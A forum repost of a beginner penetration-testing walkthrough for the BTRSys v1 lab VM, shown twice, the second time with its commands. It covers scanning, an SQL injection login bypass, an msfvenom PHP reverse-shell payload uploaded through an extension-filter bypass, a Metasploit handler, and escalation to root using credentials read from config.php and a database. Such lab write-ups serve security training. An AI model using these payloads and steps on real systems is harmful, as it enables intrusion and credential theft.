lewoxo
Final Boss
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
500 XP
BTRSys v1 is another lab by âismailonderkayaâ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.
Difficulty level: Beginner
WalkThrough
Letâs start with finding our target as always by using the following command:
Now as we know our target is 192.168.0.105. Letâs use nmap on it. We all know nmap has many types of scans but aggression scan is much better as it combines and gives all the information at once.
Through nmap, we know that port 21, 22 and 80 are open with the services of FTP, SSH, and HTTP respectively. As nmap hasnât told us much; we shall dig deeper by using Nikto. Nikto is an open-source web server scanner which allows you look for vulnerable files/programs, outdated versions, index files, http server options, etc. to use Nikto type :
With the help of Nikto, we know that there is login page Ă /login.php
Letâs go the login page by typing the following in URL:
So now we in on login page but we do not have credentials to log in. Letâs check its page source.
Now in the page source if you observe the function control carefully, youâll realize that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:
Use brute force to apply SQL injection. (When asked for text file for brute-force, select the one with the list of all SQL injection commands)
After the completion of brute force, it will give the correct SQL code which will help you log in as shown in the above image.
Right click on that code and select âShow response in browserâ as shown above. This will open the browser and you will find yourself automatically logged in.
Login Details: @btrisk.com â or â=â
As we are logged in, there is an option to upload a file. Here, we can upload our malicious PHP code. To generate the code go to the terminal of kali and type:
Copy the code from <?php to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.
When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burp suite.
Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.
Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next, we will use DIRB. And for that type:
Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:
Like always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:
After the handler is activated and your file is executed; you will have your meterpreter session. Letâs then further check system information and for that type:
Now that we have meterpreter session letâs explore a bit and look into HTML files:
There is a config.php file in var/www/html. This file has often proven to be important so letâs check it out.
Through config.php we know that one of the following words is a username and password :
Letâs now go to shell and try to log in through these three keywords :
And then enter password toor
Once logged in letâs look for tables by using the following command :
As shown in the above image there is a table named user. Letâs see what this table has :
From the table, we now know that the password for root is asd123***. Letâs login from it :
Letâs confirm our root access :
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Difficulty level: Beginner
WalkThrough
Letâs start with finding our target as always by using the following command:
Code:
netdiscoverNow as we know our target is 192.168.0.105. Letâs use nmap on it. We all know nmap has many types of scans but aggression scan is much better as it combines and gives all the information at once.
Code:
nmap -A 192.168.0.105Through nmap, we know that port 21, 22 and 80 are open with the services of FTP, SSH, and HTTP respectively. As nmap hasnât told us much; we shall dig deeper by using Nikto. Nikto is an open-source web server scanner which allows you look for vulnerable files/programs, outdated versions, index files, http server options, etc. to use Nikto type :
Code:
nikto -h http://192.168.0.105With the help of Nikto, we know that there is login page Ă /login.php
Letâs go the login page by typing the following in URL:
Code:
192.168.0.105/login.phpSo now we in on login page but we do not have credentials to log in. Letâs check its page source.
Now in the page source if you observe the function control carefully, youâll realize that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:
Use brute force to apply SQL injection. (When asked for text file for brute-force, select the one with the list of all SQL injection commands)
After the completion of brute force, it will give the correct SQL code which will help you log in as shown in the above image.
Right click on that code and select âShow response in browserâ as shown above. This will open the browser and you will find yourself automatically logged in.
Login Details: @btrisk.com â or â=â
As we are logged in, there is an option to upload a file. Here, we can upload our malicious PHP code. To generate the code go to the terminal of kali and type:
Code:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f rawCopy the code from <?php to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.
When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burp suite.
Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.
Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next, we will use DIRB. And for that type:
Code:
dirb http://192.168.0.105Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:
Code:
192.168.0.105/uploadsd/shell.phpLike always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:
Code:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploitAfter the handler is activated and your file is executed; you will have your meterpreter session. Letâs then further check system information and for that type:
Code:
sysinfoNow that we have meterpreter session letâs explore a bit and look into HTML files:
Code:
cd /var/www/html
lsThere is a config.php file in var/www/html. This file has often proven to be important so letâs check it out.
Code:
cat config.phpThrough config.php we know that one of the following words is a username and password :
Code:
root
toor
denemeLetâs now go to shell and try to log in through these three keywords :
Code:
shell
mysql -uroot -p -DdenemeAnd then enter password toor
Once logged in letâs look for tables by using the following command :
Code:
show tables;As shown in the above image there is a table named user. Letâs see what this table has :
Code:
select * from user;From the table, we now know that the password for root is asd123***. Letâs login from it :
Code:
su root
asd123***Letâs confirm our root access :
Code:
whoamiAuthor: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here